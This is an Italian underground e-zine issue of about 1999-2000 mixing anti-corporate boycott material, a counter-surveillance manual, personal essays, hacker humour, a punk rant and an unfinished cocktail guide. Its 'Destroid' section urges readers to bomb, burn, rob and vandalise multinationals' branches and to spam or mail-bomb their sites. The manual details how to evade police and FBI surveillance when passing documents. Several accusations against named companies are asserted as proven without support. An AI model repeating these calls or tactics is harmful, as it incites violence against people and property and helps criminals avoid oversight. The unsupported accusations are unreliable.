Nel 1994 la Montedison ha stretto un' alleanza con la Shell, che non è certo
fra i migliori partner; ciò denota un disinteresseper i problemi sociali ed
ambientali da parte della Ferruzzi (si vida la multinazionale Shell).
Ferruzzi è stata la protagonista dei principali casi d' inquinamento in Italia.


Agnelli
Indirizzo: IFI, Via Carlo Marenco 25, 10126, Torino.

La famiglia Agnelli è presente in Brasile, dove la Fiat possiede alcune
fonderie e numerosi stabilimenti di auto, macchine agricole ed apparecchiature
biomediche. È comprovato che assume comportamenti antisindacali.
L' impero Agnelli comprende ache fabbriche di armi come la SNIA BPD,
la IVECO, e la VALSELLA, produttrice di mine antiuomo.
La Fiat è considerata la principale responsabile dello sviluppo distorto
del sistema dei trasporti in Italia, da sempre centrato dul modello
dell' automonile privata e del trasporto merci su gomma.
L' accordo fatto tra le industrie automobilistiche (tra le quali la principale
è Fiat) e il nostro governo che ha determinato l' adozione degli incentivi
alla rottamazione, oltre che produce una qantità enorme di rifiuti inquinanti,
ha incoraggiato la corsa all' acquisto d' auto nuove con un altro grosso
impulso verso il consumismo irragionevole.


Banche di "piombo"

Avete mai investito i vostri risparmi nel commercio di armi? No? Bhe,
forse lo sta facendo per voi la vostra banca di fiducia presso cui
avete depositato il vostro denaro.
L' articolo 185/90, che regolamenta il commercio italiano di armi,
prevede che nella relazione del presidente del consiglio al Parlamento
siano riportati i dati analitici delle operazioni di armamenti,
anche se la trasparenza prevista dalla legge è messa a dura prova
dai comportamenti degli operatori bancari.

Operazioni relative ad esportazioni di armi dall' Italia nell' anno 1997:
----------------------- ---------------
Azienda di credito quota (lire)
----------------------- ---------------
Banca Commerciale Italiana 559.606.652.137
Banca di Roma 126.324.177.990
Banca Nazionale dell' Agricoltura 48.294.412
Banca Nazionale del Lavoro 62.279.996.862
Banca pop. Bg-Cr Varesino 928.212.520
Banca popolare di Intra 66.717.561
Banca popolare di Lodi 2.544.414.344
Banca popolare di Novara 552.055.054
Banca di Toscana 491.082.053
Banca Ambrosiano Veneto 65.237.144
Banca di Chiavari e della Riviera Ligure 2.591.485.567
Banca di Napoli 266.001.105
Banco S. Paolo di Torino 6.135.128.734
Cassa di Risparmio di La Spezia 5.940.162.652
Cassa Risparmio Prov. Lombarda 0.735.915.391
Credito Italiano 189.452.954.884
Monte dei Paschi di Siena 190.984.864.730



*Activism*
L'attivismo è sicuramente fondamentale, non esitate a distribuire
volantini e materiale vario che sottolineano il 'lato oscuro' delle
aziende: l'ideale sarebbe quello di distribuire il tutto proprio
davanti alla succursale della multi della vostra citta'. Convincete la
gente a non aquistare i loro prodotti. Vi potete aiutare facilmente con
molto materiale reperibile in rete presso gli indirizzi:

http://www.rtmark.com
http://www.adbusters.org
http://www.manitese.it/boycott/
http://www.tmcrew.org/csa/l38/multi/



*Destroid*
Inizia il lato piu' divertente: potete rendere inservibile il
locale dell'azienda e i relativi prodotti, ecco pochi degli infiniti
modi per distruggere le succursali cittadine delle multinazionali:

-Rompete le vetrine tirandogli una candela di macchina...
-Sabotate i loro prodotti
-Lasciate qualcosa di indesiderato dentro i loro locali
-Comprate delle esche (quelle per pescare) e riversatele nei punti
piu' 'hot' dei loro locali (ancora meglio sono degli insetti + grandi ;)
-Lasciate delle uova marce per terra
-Mettete una bomba nei loro locali ;)))
-Lasciate il loro numero tel. appeso nelle cabine con un annuncio
erotico al di sopra
-Date fuoco ai locali ;))))
-Rovinate le attrezzature dei locali: datevi al vandalismo!
-Mettete una stinky bomb
-Fate una rapina ;)))
-Evitate che restino appesi dei cartelloni pubblicitari della ditta
[potete lanciargli una molotov, strapparli...]

Nel caso in cui l'azienda abbia un sito web potete:

-Hackerate il loro sito web (fantascienza ;))
-Radunate un Netstrike sul loro sito web
-Riempite di spam le loro caselle e-mail
-Inviategli una mail bomb


---Cyb0rG/OlDrake--- [ dGt_brAinS ]

-=!!!|-mAnuAle dI c0Ntr0s0rVegLiaNzA x gEsTirE c0nTattI cLanDesTinI-|!!!=-

Autore: Harry Caul

Il presente articolo è scritto a scopo informativo, di ricerca e
intrattenimento. Le parole "tu" e "io" sono usate soltanto per facilitarne la
lettura.

Questo articolo ti insegna come capire se si è controllati prima di
incontrarti con i tuoi contatti clandestini. Imparerai un protocollo che
contrasterà servizi di sicurezza come FBI, BATF, DEA, e altri. Il metodo è
particolarmente efficace contro la sorveglianza standard della polizia.
Funziona anche contro i cosiddetti gruppo di ispezione della IRS.

Le origini del manuale. Il metodo descritto in questo articolo fu
originariamente congegnato nel 1943-1944 dall'esperto di controsorveglianza
Anthony Blunt per MI.5 britannico. Sfortunatamente per la Britannia, Blunt
era un agente sotto copertura del KGB.

Sei anni dopo, Blunt insegno' il protocollo al suo nuovo controllore del KGB,
Yuri Modin. Insieme perfezionarono la tecnica così come oggi è conosciuta.
Ostacolarono con successo per tre anni la sorveglianza del MI.5, a volte
incontrandosi anche giornalmente per scambiarsi informazioni e documenti top
secret. In effetti, Blunt stava utilizzando le tecniche di sorveglianza
sviluppate all'interno del MI.5 per batterli al loro stesso gioco.

Proliferazione. Questo metodo di controsorveglianza è stato adottato dal
Mossad israeliano, dalla BND tedesca, dal KGB (ora SVR) russo, dalla
americana CIA, e da molti altri. Il protocollo è impartito agli agenti
dell'intelligence ai loro controllori - questi sono ufficiali dell'intelligence
che gestiscono e si incontrano con gli agenti infiltrati nei paesi stranieri.
Il metodo è oggi anche usato dai movimenti di resistenza e dai gruppi di
guerriglia urbana.
Quando questo protocollo di controsorveglianza è applicato metodicamente, è
estremamente difficile per un servizio di sicurezza violare la tua sicurezza.

Istruzioni passo per passo...

Ecco una situazione ipotetica. Mettiamo che tu ed io volessimo incontrarci
clandestinamente. Naturalmente assicurandoci che il nostro incontro non sia
osservato da gruppi di sorveglianza.

Tu ed io ci siamo precedentemente messi d'accordo sul luogo, la data, e l'ora. Inoltre ci conosciamo nel senso che riusciamo a riconoscerci a vista.

*[ sTeP #1 ]*

Tu ed io arriviamo indipendentemente nel luogo precedentemente concordato.
Piuttosto che fissare un luogo specifico, ci siamo accordati solo su un luogo
generico. Questo è un principio importante. Può essere un grande parco, un
distretto residenziale, ecc... Il posto dev'essere all'aperto e lontano dalla
sorveglianza di telecamere. Dev'essere anche selezionato con l'intenzione di
evitare i teleobiettivi.

Tu ed io dovremmo conoscere bene l'area. Il luogo ci dovrà fornire una
ragionevole copertura una volta li' - gironzolando per il parco, passeggiando
in un area residenziale fino ad una fermata di autobus, un negozio di
convenienza, ecc...

*[ sTeP #2 ]*

Tu ed io ci faremo un segnale visivo ad un certa distanza l'uno dall'altro.
Lo faremo discretamente, in modo che altri non se ne accorgano. Io uso un
segnale concordato per avvertiti che ti ho riconosciuto. Forse metterò la
giacca sulle spalle, o mi levero' e pulirò i miei occhiali, ecc.. Il segnale
deve essere un movimento naturale che non attrae attenzioni indesiderate.

La sicurezza per prima cosa. Sebbene io e te ci siamo riconosciuti, non
dobbiamo rivolgerci la parola. Questa è un'importante valvola di salvezza. Se
uno

  
di noi ha "sviluppato una coda" non vogliamo compromettere l'altro.

BACKGROUND - La frase "sviluppare una coda" ("grown a tail" nel testo
originale) è nel linguaggio delle spie un modo per dire che si è
sotto sorveglianza. La frase è comunque imprecisa nel senso che
nessuno ti segue, ma spesso ti circondano.

*[ sTeP #3 ]*

Quando vedi il mio segnale cambierai semplicemente strada. Io ti seguirò per
assicurarmi che non sei stato visto. Controllerò con cura la presenza di
gruppi di sorveglianza in movimento . Di agenti in postazioni fisse. E in
veicoli di sorveglianza.

BACKGROUND - In particolare, io posso seguirti, camminare parallelamente a te,
o avanti a te occasionalmente. L'obbiettivo è semplicemente
quello di essere vicini tanto da permettermi di rilevare
eventuale sorveglianza intorno a te. Rimarro' sempre ad una
certa distanza da te, senza mai avvicinarmi troppo.

*[ sTeP #4 ]*

Quando mi sono assicurato che tu sei pulito, ti farò un altro segnale. Forse
mi allaccerò le scarpe.

*[ sTeP #5 ]*

Ora ci scambiamo i ruoli e questa volta sarò io a cambiare strada. Tu
inizierai a seguirmi assicurandoti che non sono stato osservato. Controllerai
la presenza di gruppi di sorveglianza in movimento . Di agenti in postazioni
fisse. E in veicoli di sorveglianza. Cosa cercare. Osserverai con cautela le
persone che camminano al passo con me o che si muovono parallelamente a me.
Controllerai le persone che indugiano in posizione tale da potermi osservare.
Osserverai le persone che vanno e vengono ma che si trovano sempre in
posizione tale da potermi monitorare. Starai attento ai veicoli che lasciano
scendere qualcuno avanti a me.

*[ sTeP #6 ]*

Appena appurato che sono pulito, mi farai cenno che non sono osservato. (al
contrario, se sospetti che un gruppo di sorveglianza è nelle vicinanze,
abbandonerai l'operazione e ti dileguerai).

BACKGROUND - Devi controllare i tuoi istinti, perchè se qualcosa non sembra a
posto è meglio salvarsi che scusarsi. Molta gente si sorprende
quando apprende che non è difficile rilevare un gruppo di
sorveglianza. Questa è la sottile eleganza del sistema di
controsorveglianza di Blunt. E i goffi sono indifesi contro di
esso.

*[ sTeP #7 ]*

Ora io e te possiamo incontrarci. Dopo la nostra discussione ci accordiamo
sulla data, l'ora e il posto del nostro prossimo incontro clandestino - e sui
due piani di riserva nel caso in cui l'incontro fosse ostacolato dalla
sorveglianza. Se non riusciamo ad incontrarci nel primo luogo, useremo il
piano di riserva e ci incontreremo allo stesso posto e alla stessa ora una
settimana più tardi. Se invece riusciamo ad incontrarci, ci riferiremo al
convenuto piano e ci incontreremo in un diverso posto all'ora e alla data
stabiliti.
Nè io nè tu scriveremo i particolari del nostro prossimo incontro. Terremo i
dettagli a mente.

BACKGROUND 1 - Se hai documenti da darmi, io non li accetterò fino alla
conclusione del nostro incontro . Starò già per fuggire quando
acetterò i documenti. Questo riduce le possibilità di essere
scoperti e arrestati dal gruppo di sorveglianza che è stato
addestrato a eludere il nostro protocollo di controsorveglianza.
Se il servizio di sicurezza agisce troppo alla svelta non avranno
prove contro di me, perchè i documenti non mi sono ancora stati
passati.

BACKGROUND 2 - I migliori agenti non mescolano mai discussione e documenti. Se un
documento dev'essere passato, non servono discussioni. L'intero
contatto si riduce ad un momento - "the perfect brushpass". Il
principio è semplice. E' avventato temporeggiare tenendo
documenti incriminanti.


Le spie in Nord America chiamano questo protocollo in sette passi per la
controsorveglianza "drycleaning". In Europa, viene chiamato "parcours de
sécurité" - una frase francese che può essere tradotta come percorso di
sicurezza o circuito di sicurezza.

---Harry Caul---

###########################
#+-----------------------+#
#| lEt'S tHiNk Ab0uT iT! |#
#+-----------------------+#
###########################

-=!!!|-UnA brEvIsSimA rIfLesSi0Ne-|!!!=-

Autore: Kaspita

Sono alcuni mesi ormai che medito di scrivere questo articolo
forse ero in attesa dell'illuminazione dal cielo Chissa'!!!
Tutto e' iniziato all'incirca un anno fa, prima ero all'oscuro
dell'esistenza di questo mondo.
Un giorno uno di quei giorni in cui puoi scegliere di
appollaiarti sopra la TV assorbendo passivamente quello che
trasmette o riempire le "misere" tasche di mamma Telekozza!!!
Tra le due alternative… perché non scegliere la peggiore?
Collegamento ad internet! e chi becco? Un maestro!!! (emm.. non
vuole essere chiamato cosi' ma ormai l'ho fatto! ;-)
Mi chiede: "Hai mai sentito parlare di sicurezza informatica e
di hacking?"
Risp:"E' commestibile? E' buono? Gnam! Gnam!" e da qui ha inizio
una riflessione personale.
(I non interessati possono passare all'articolo successivo,
prima che vi annoiate piu' di quanto gia' lo siate dopo aver
letto queste poche righe… non andate a lamentarvi dal Capo
altrimenti sono kavoletti amari.. pour moi !!! eheheh..)
Se qualcuno avesse voglia di perdere altri 2 minuti (non di
piu'!) del proprio prezioso tempo puo' farlo a suo rischio e
pericolo naturalmente !!!
Tante giornate trascorse a rigirarmi i pollicioni potevano
essere impiegate in maniera piu' proficua ma ci si accorge
soltanto dopo! Mesi e mesi (in realtà non sono cosi' tanti)
trascorsi su file di varia natura per cercare di recuperare il
tempo perso. Nottate passate tentando di raccogliere i primi
frutti: raccolto tutto sommato molto misero!!!
E dopo tutto questo tempo un giorno il Maestro mi chiede: "un
articoletto quando lo scrivi?" Eeeeeeeh… agli ufo ci posso
anche credere! ma non sono di certo all'altezza di dare
insegnamenti ad altri! Mi considero solo UNA principiante!!!
Come, come, come? Vi sta sorgendo qualche dubbio? Forse un
miraggio?
Ebbene si, una donzella che scrive !!! Capisco perche' sgranate
gli occhi, siamo talmente rare in questo campo, Eccezion fatta
per la mitica Elsa288 (continua cosi' che sei forte!) non ho
ancora avuto il piacere di trovarne altre!
Lungi da me ora iniziare tutto un discorso femminista, anche se
lo state gia' pensando! Un po' perche' sarebbe fuori luogo, un
po' perche' non e' proprio mia intenzione farvi annoiare piu' di
quanto gia lo siate.
Mi chiedo soltanto: perche' ci sono piu' (o SOLO) maschietti che
dedicano il loro operato in questo settore? Non che il fatto mi
dispiaccia, ANZI !!!!!
eheheh… Ecco un esempio: basta leggere il nick degli autori
presenti in questi articoli, basta leggere qualsiasi Tutorial,
di chi sono? di un maschietto e chi piu' ne ha piu' ne metta!
Nulla da ridire su tutto cio', sono soltanto "delusa" dallo
scarso impegno da parte femminile, dalla scarsa collaborazione!
Non voglio passare per una rivoluzionaria, sono solo convinta
che piu' menti lavorano su un determinato progetto, prima si
giungera' allo scopo prefissato!
Questo articolo e' puramente riflessivo, magari a qualche
donzella in ascolto si accenderà la lampadina, come e' avvenuto
per la sottoscritta! Se nel primo articolo (il n. 0) della
E-zine c'era solo una collaboratrice, nel terzo (il n. 2) ce
n'e' una in piu', nei successivi ce ne saranno decine!
opss.. mi sono lasciata trasportare dall'entusiasmo! Meglio
non fantasticare troppo!
La mia breve riflessione si conclude qui (finalmente !!!!) :-x
e come ogni articolo che si rispetti non posso trascurare i
ringraziamenti finali. Se oggi ho la possibilita' di comparire
in questa rivista lo devo all'insegnante che ho avuto, sono mesi
che mi sta sopportando -una pazienza immane- gli ho stressato
la vita parecchie volte! E' riuscito a "estrapolarmi"
dall'ignoranza della massa, ad "inizializzarmi" un pochino,
ha avuto il coraggio di esporsi, ha dimostrando una grande
fiducia nei miei confronti, nei confronti di una femminuccia!!!
GRAZIE JACK !!!
Un ringraziamento particolare a "er Capoccia" per lo spazio
concessomi in questa rivista: THANKS !!!
Un salutone a tutti!

---KaSpiTa---
@-->-->--


-=!!!|-dEaD bUlK wAlKiNg-|!!!=-

Autore: 0lDir0N61

In questo articolo vorrei esprimere, e con me tutto l'Anarchy in The System
squad, solidarieta' nei confronti del "L.S.O.A Deposito Bulk".
Quando leggerete questa e-zine puo' essere che il problema si sia gia'risolto,
in maniera positiva o negativa....ma le cose fino ad ora stanno cosi':
Il <Laboratorio Studentesco Occupato & Autogestito "Deposito Bulk">, okkupato
dai RASC (Rete Autogestita Studenti & Collettivi) e che in se' racchiude molti
progetti e realta' (RASC;Internet_Cafe';2 sale da bar;sale da concerto;
infoshop;librerie;camere oscure;sale prove;Contro-informazione sulle droghe;
lotta al probizionismo;laboratori artistici e di teatro;Danza;attivita' con
i bambini del quartiere "Azimut";Associazione culturale "Interzona525";
Aule Studio;Gruppo di sperimentazione informatica;oltre al fatto che e' stato
sede dell'Hack-it '99)
che hanno risvegliato gli animi in quella zona triste e lugubre, con una
curva, quella curva che rischia di mandare a PUTTANE tutto il lavoro del bulk!
Infatti il Bulk (Che il 12 dicembre ha compiuto il suo secondo anno di vita)
rischia di essere sgomberato, vogliono costruire un ponte sopra di loro,
per una strada da ricostruire e rendere -!!!- s0ciAlMenTe uTilE-!!!-
per il comune di Milano, comune che ,tramite manovre di "pulizia ambientale"
hanno fatto spostare il Leonkavallo, hanno chiuso Parco Vetra, hanno
trasformato parco Sempione in un posto dove la gente DEVE aver paura di andare
Lo Sgombero del Bulk sarebbe un altro punto a favore dei
-!!!- BUFFONI -!!!-
che "governano" Milano! Mi riferisco ad Albertini e Verro, assessore al
demanio della giunta milanese....
Costoro hanno messo la loro BELLA ed IMPORTANTE firma su questa ordinanza, che
sancisce il passaggio di un ponte sopra quello che ora e' il deposito Bulk,
sopra a quello che da due anni e' uno dei pochi capisaldi della cultura
"Alternativa"....
Noi non possiamo assolutamente permettere che tutto cio' succeda, Milano
perderebbe un altro punto di riferimento, dando la citta' in mano a SBIRRI che
non sanno fare altro che Picchiare e Blokkare l'esistenza a dei ragazzi che
vogliono semplicemente trovare un proprio spazio libero, dove ci si puo'
comportare liberamente senza nessuno che ti skazza perche' stai fumando uno
spino, senza dare fastidio a nessuno!
Tutto questo non si avverera' solo se ci sara' solidarieta' verso questo
spazio sociale, solo se anche VOI aiuterete a far continuare a vivere il
Deposito Bulk...
Quindi aiutateci!,sosteniamo le nostre conquiste nella citta', sosteniamo
il "DeP0sit0 BulK" !!!!!


=[ uPdAte ]=

Come non detto... LSOA "Deposito Bulk" sgomberato dallo stabile di via Sturzo.

...Ma bolle qualcosa di nuovo in pentola...

--------------------[ Recuperato da sito del Bulk ]---------------------------

<<Non si puo' sgomberare una societa' che desidera. E' arrivato il tempo di
prendere il giusto posto in questa citta'>>

...Uno stabile dismesso di proprieta' dell'Enel occupato durante il cambio di
millennio. OTTOMILA mq che riempiremo in breve di progetti e attivita', con
un po' di rabbia e disillusione in piu', ma piu' determinati a ottenere
risultati concreti, non sgomberabili dall'ignoranza istituzionale.

*[ SAREMO SEMPRE NELLA CITTA', PIU' NUMEROSI DI PRIMA. ]*

=============================] 31-12-1999 [===================================

Il Laboratorio Studentesco Occupato & Autogestito "Deposito Bulk" si trova ora
in

Via Niccolini 36
Tel. 0333-2074198 - 0339-2744441 - 0339-6593332
Web. http://www.ecn.org/bulk
@ bulk@ecn.org

---0lDir0N61---


-=!!!|-k0sA n0n fA uN vEr0 hAcKeR-|!!!=-

Autore: BlueBoy

Il sabato sera e` un classico per gli hackers.
Ti puoi rendere conto che la serata butta male dal tono di voce con cui
la tua donna ti invita a seguirla al party dell'amica: piu` e` mielosa,
meno chances ci sono di divertirsi; e siccome il sabato sera non ti puoi
inventare la scusa-tipo "..devo studiare" (scusa che solitamente adotti
per poter trascorrere qualche ora in piu` davanti al monitor), eccoti
bello e fregato costretto a "divertirti" e a "essere piu` sociale".
Ogni volta la speranza e` la stessa: la donna si ammala o non puo`
uscire, e tu prepari birrozza fantozziana, panini e mars per una
sessione di almeno 6 ore su Itapac; la realta` invece e` che la tua
donna sta benissimo, e ti sta guidando senza pieta` verso la festa.
La casa e` piena di gente che non hai mai visto, e dopo appena 2 minuti
cerchi se per caso da qualche parte (non si sa mai) hanno installato un
terminale da poterci smanettare.
Il classico amico che non vedi da un anno ti presenta alle donne come
"quello del computer di cui vi parlavo.." ; le donne non gradiscono
per niente, pero` l'uomo di una ti si avvicina e ne approfitta per
estorcerti informazioni preziose sulla programmazione in BASIC del C64.
Tu, che il C64 lo odi e che da poco cominci a credere di conoscere sul
serio Unix, lo guardi male e pensi : bifolco.
Lui insiste, divaga sul "drive" del suo giocattolo, tu annuisci e pensi
"controlpi cielle-erre".

La biondina che e` arrivata sola ti si avvicina mentre -pensieroso- stai
ripensando alla c-shell di uno strano Ultrix che hai hackato.
Lei probabilmente pensa tu abbia dei problemi (vero, i metacaratteri
della c-shell creano sempre problemi..) e ti rivolge un promettente
"Ciao" tutto da interpretare (o compilare,a seconda di come ti senti).
"ACP: COM", pensi dentro di te, e ricambi sorridendo il saluto; gia` ti
stai facendo strane idee, quando alle tue spalle noti la sagoma inconfon-
dibile della tua donna. "ACP: RESET RPE" le vorresti dire, ma la situa-
zione e` fin troppo chiara: la portante e` gia` caduta.
La festa e` fiacca, si formano i gruppetti mentre tu pensi che in questo
momento probabilmente c'e` Pengo ad Altos che chiacchera con Blau.
Un tizio e` tempestato di domande, scopri che fa deltapano; li guardi
mentre lo invidiano, loro non sanno che tu -proprio ieri- sei entrato
nel VAX della DynaComp, e hai fatto partire l'UAF...
Dove si va in vacanza questa estate? Confusione spaventosa con proposte
geograficamente azzardatissime (Kilimangiaro??); tu le idee in proposito
le hai ben chiare: prima tappa a Monaco per visitare Altos, seconda tappa
Essex (i terminali di Mud si devono vedere almeno una volta nella
vita..), terza e ultima tappa Parigi, dove c'e` un Univac 1100 che ti
fa impazzire..
Hey, c'e` uno che fa informatica.. bene bene, cerchi subito - come prima
cosa - di sapere nome e codice di addebito della sua password sui termi-
nale di facolta`. Si specializza in telecomunicazioni..mhm.. "..sai che
cos'e` un dialout?" . No, il tipo non conosce i dialout.
"Ignorante" concludi.
Grosso vociferare di maschi: e` arrivata una sbarba scosciatissima.
Per due ore con quella - tu pensi - saresti disposto a dare via la
NUI a 1200 baud..
Intanto arriva la torta; mentre azzanni una fetta, concludi che la
prima cosa da fare una volta a casa e` controllare se per caso hanno
riaperto quella Gateway in Belgio.. la donna ti guarda malissimo: in
tutta la serata ti sei fatto i fatti tuoi alla grande; per farti
perdonare balli un lento.
Lei ti stringe, tu tentenni. Ripensando a Telenet, quella NUA che hai
trovato non puo` essere un X25, al massimo e` un vax-cluster..
Finalmente finisce, se Dio vuole. Saluti e baci, ciao e grazie, di corsa
a casa.
La donna non molla: i parents sono out. Ahia..
Un problema.. cosa gli puoi raccontare? La balla del sonno non sta in
piedi, si vede benissimo che sei talmente in forma che potresti
sollevare un pad ...
Le chiavi, hai dimenticato le chiavi e quindi prima torni meglio e`
dato che devi svegliare i tuoi. Lamaddonna che tardi (in chat ci saranno
solo gli australiani), ciao e buonanotte.
Il percorso casa-casa-modem lo copri in tre minuti, corsa in ascensore,
accensione monitor, hard disk e computer, modem, itapac..
ACP:CLR NC . Come NC?? Tutto NC, anche il Cilea.
Un lungo, pietoso lamento disturba il sonno dei vicini.
Pensi che -dopo tutto- la vita e` una continua commutazione dei tuoi
pacchetti, entri nel letto maledicendo Itapac, spegni la luce.
Ti addormenti sperando, almeno, di sognare a 9600 baud..

Buona notte, hacker!

---BlueBoy---

-=!!!|-Lettere di una giovane Punk ribelle-|!!!=-

Autrice: FuCk

"Questo paese di merda sta opprimendo le mie idee, non si puo' fare niente,
tutti hanno la mente offuscata dalle stronzate che vongono dette da quella
gente che pensa solo a creare ragazzi uguali allo sterotipo che hanno in quel
fottutissimo cervello.
Tutti sono li' pronti a leccare il culo per ottenere qualche stupido
riconoscimento o merito, mentre gli altri sgobbano al posto loro.
Per una come me, che invece non sopporta questo plagio, e' dura sopravvivere.
Tutti sono li' pronti a guardare come e cosa faccio per giudicarmi e valutarmi,
anche se loro non sanno che a me non me ne frega un cazzo.
Quando li incontro sento le loro voci che dicono solo cattiverie, ma
questo non mi crea problemi, perche' non sono il tipo che concentra la sua
esistenza su cio' che potrebbero dire gli altri di me.
Poi loro mi fanno solo pena perché sono dei comunissimi paolotti che la
domenica vanno all'oratorio a prendersi cura di un marmocchio che rompe i
coglioni.
Ma mettetevi a posto! Io non ci sto, non voglio affondare come loro in un
mucchio di ideali sputtanati.
Loro pensano a quando cresceranno, avranno forse molti soldi e probabilmente
anche una famiglia. Stronzate, io non ci tengo a vivere un'esistenza cosi'
triste.
Alcune persone quando passo, mi guardano come se fossi il pericolo no.1
(probabile) e poi continuano a dire che e' un peccato per una ragazza cosi'
carina essere diventata cosi'.
La loro compassione se la possono tenere per quei poveri cristi che muoiono
di fame mentre loro stanno buttando nel cesso cio' che avevano mangiato, per
paura di ingrassare.
Qui io mi sento una bomba che sta per scoppiare. La mia miccia sta per
finire e quando questo accadra' non so quante vittime faro'.
Per adesso ho solo incontrato gente che mi ha voltato le spalle perche' non
aveva le palle per ribellarsi. Anche da solaio continuero' a pensarla cosi'.

"Nulla di ciò che l'uomo vede esiste veramente.
Tutto ciò che ci circonda è solo un'illusione ottica che si
è proiettata nella società in cui viviamo.
Oggi tutto fa parte di un chiaro disegno creato da chi sta
sopra di noi.
Siamo tutti dei burattini che dicono e agiscono secondo
quello che il burattinaio decide."

"Non ce la faccio più a subire in silenzio
tutti gli insulti di quei fottutissimi dittatori
che ci hanno portato in questa merda di società.
Prima o poi scoppierà ed il mio pensiero anarchico
distruggerà le fondamenta di questa democrazia corrotta
che non fa altro che creare scompiglio nella popolazione
che di nascosto,però, si sta preparando alla rivoluzione
Nessuno verrà risparmiato perché la colpa è po' di tutti
perchè abbiamo permesso a questi pirla di decidere della
nostra vita".


--FucK---


+--------------+
#|##############|
#+-[ aLkoLiKs ]-+
#|## ######## ##|
#+--------------+
################

-=!!!|-aLk0L & c0kTaiLs!-|!!!=-

Autore: SiX

Dedicato a tutti quelli che hanno problemi con l'alcool

Thanks To ......
Tutte le straniere che vengono in villeggiatura dove abito, continuate
cosi' ;-)

Fucks To
...fanculo alla scuola o squola?
...Fanculo allo spam a alla Telecoma.



La parola cocktail apparve per la prima volta negli Stati Uniti, inizialmente
i barmen adornavano le bevande per attirare maggiormente l'interesse dei
turisti. Questa moda arrivo' negli anni venti anche in Europa e
successivamente in tutto il mondo.
Il cocktail non e' altro che una miscela di due o piu' prodotti alcolici,
aromatizzata e decorata.
La famiglia dei cocktail e' divisa in 24 gruppi :

Grogs
I grogs sono short drink caldi, che vanno consumati nella stagione fredda, a
base di acquavite, acqua caldissima, bucce di limone, chiodi di garofano e
cannella. e sono per esempio : Rum grog, Grappa grog; Brandy grog, ecc.

Slings
Gli slings sono un'altra varieta' dei grogs. Si preparano caldi e si servono
in bicchieri. La forma principale: l'acquavite e la noce moscata.
Questi cocktail assumono il nome dell'acquavite impiegata, completato da hot
se caldo, da cold se freddo: Gin sling, Whisky sling, ecc.

Richeys
E' uno dei cocktail piu' richiesto dagli americani, e' uno short drink dove il
lime (piccolo frutto molto simile al limone) e' di rigore.
Il lime va tagliato a fettine, messo in un bicchiere ed annegato con
l'acquavite desiderata, da cui il cocktail assume il nome: Rum richey,
Scotch richey, Gin richey, ecc.

Coolers
I coolers sono long drink refrigeranti, con birra, acquavite, liquori,
sciroppi di frutta, vino e bucce di limone. Di solito hanno nomi di fantasia:
Manhattan cooler, Indian cooler, ecc.

Collins
I collins sono long drinks. Sono esclusivamente a base di acquavite, succo di
limone, ghiaccio in cubetti e soda . Lo spirito di base da' il nome a questo
cocktail: Vodka collins, Gin collins, Brandy collins, ecc.

Crustas
I crustas sono short drinks , energetici, a base di acquavite, succo di limone
zucchero e frutta. Vengono preparati nello shaker. Il bicchiere deve essere
imbottito all'interno con buccia di limone tagliata in unica spirale sulla
quale si versa il contenuto dello shaker. I crustas assumono di solito il nome
dell'acquavite impiegata: Whisky crusta, Brandy crusta, Gin crusta, ecc.

High-balls
Gli high-balls sono dei long drink estivi. I componenti che possono essere
impiegate sono molte: acquaviti, alle quali vanno aggiunti , soda, acqua
minerale , cubetti di ghiaccio, una buccia di limone e Coca e non Cola ;-)
Questi cocktail assumono i nomi della qualità o della marca dell'acquavite
impiegata: Gin high-ball, Whisky high-ball, Brandy high-ball, ecc.

Punches
I punches possono essere short drink caldi, o long drink freddi. Hanno come
base le acquaviti, i vini e la frutta. Prendono nomi di fantasia o dello
spirito predominante: Milk punch, Brandy punch, ecc.

Shrubs
Il shrub e' una varieta' del grog, a preparazione piuttosto complicata. Ha
come base l'estratto chiaro e bollito di frutta macerate in acquavite. I
bicchieri devono essere colmati di acqua bollente e fettine di limone. E'
possibile che il shrub venga servito come un punch, cioè freddo in bicchieri
colmi di ghiaccio. In questo caso non si puo' parlare dell' originale shrub
americano. Questi cocktail assumono il nome del frutto o dell'acquavite
predominante: Brandy shrub, Whisky shrub, ecc.

Daisies
I daisies sono short drinks estivi e vengono preparati nello shaker, a base di
acquaviti, succo di limone , granatina e soda. Assumono di solito il nome
dell'acquavite utilizata: Brandy daisy, Gin daisy, Rum daisy, ecc.

Cobblers
I cobblers sono long drinks a base di vino ed acquaviti. I bicchieri devono
contenere ghiaccio tritato, e decorati di fragole, ciliegie, fettine di limone
o di arancia. Essi assumono di solito il nome dell' acquavite o del vino
impiegato: Brandy cobbler, Whisky cobbler, ecc.

Cups
I cups sono long drinks freddi che si preparano in caraffa e che possono
essere consumati anche durante la colazione o il pranzo. Sono a base di vino,
liquori, zucchero, aromi, acqua minerale, frutta fresca di stagione. Assumono
nomi di fantasia, del vino o del liquore impiegati: Spumante cup,
Ginger ale cup, ecc.

Smashes
Gli smashes sono antichi long drinks americani abbondantemente aromatizzati
con succo di menta fresca. Questi hanno come base soltanto i liquori e le
acquaviti. Assumono in prevalenza il nome del liquore o dell'acquavite
impiegati: Brandy smash, Whisky smash, ecc.

Sours
I sours sono short drinks dove l' elemento principale e' il succo di limone.
La loro base principale, oltre al di succo di limone, sono le acquaviti.
Assumono nomi di fantasia o dello spirito predominante: Rum sour, Brandy sour,
Gin sour, ecc.

Sangarees
I sangarees possono essere short drinks o long drinks secondo la loro
composizione. Vengono impiegati oltre ai liquori anche i vini e la birra.
Assumono nomi d fantasia o della bevanda alcolica predominante:
Brandy sangaree, Rum sangaree, Whisky sangaree, ecc.

Fixes
I fixes sono long drinks preparati nello shaker con succhi di frutta,
sciroppi, acquaviti e soda. Assumono il nome dello spirito impiegato:
randy fix, Gin fix, ecc.

Juleps
I juleps sono long drinks rinfrescanti, con estratto di menta fresca, vino,
spumante, acquavite, liquori e sciroppi. L'estratto di menta fresca si puo'
ottenere pestando in un mortaio qualche foglia di menta con un po' d'acqua ed
un po' di zucchero. L'estratto, prima di metterlo nel bicchiere, va passato in
un colino. I juleps assumono nomi del vino o allo spirito impiegati:
Brandy julep, Whisky julep, ecc.

Mulls
I mulls sono dei long drinks a base di vino bollente aromatizzato, viene
preparato in una casseruola e che perde una parte del suo alcool perche'
s'infiamma durante la bollitura. Quando vengono preparati i mulls s'impiegano,
spesso delle uova, che vengono sbattute a parte in una scodella e poi viene
versato il vino bollente aromatizzato con chiodi di garofano, fettine di
limone, un bastoncino di cannella, e ben zuccherato. I mulls hanno il nome del
vino impiegato: Claret muslin, Mulled port, Sherry muslin, ecc.

Egg-nogs
Gli egg-nogs sono long drink sia estivi che invernali. Se non lo avete capito
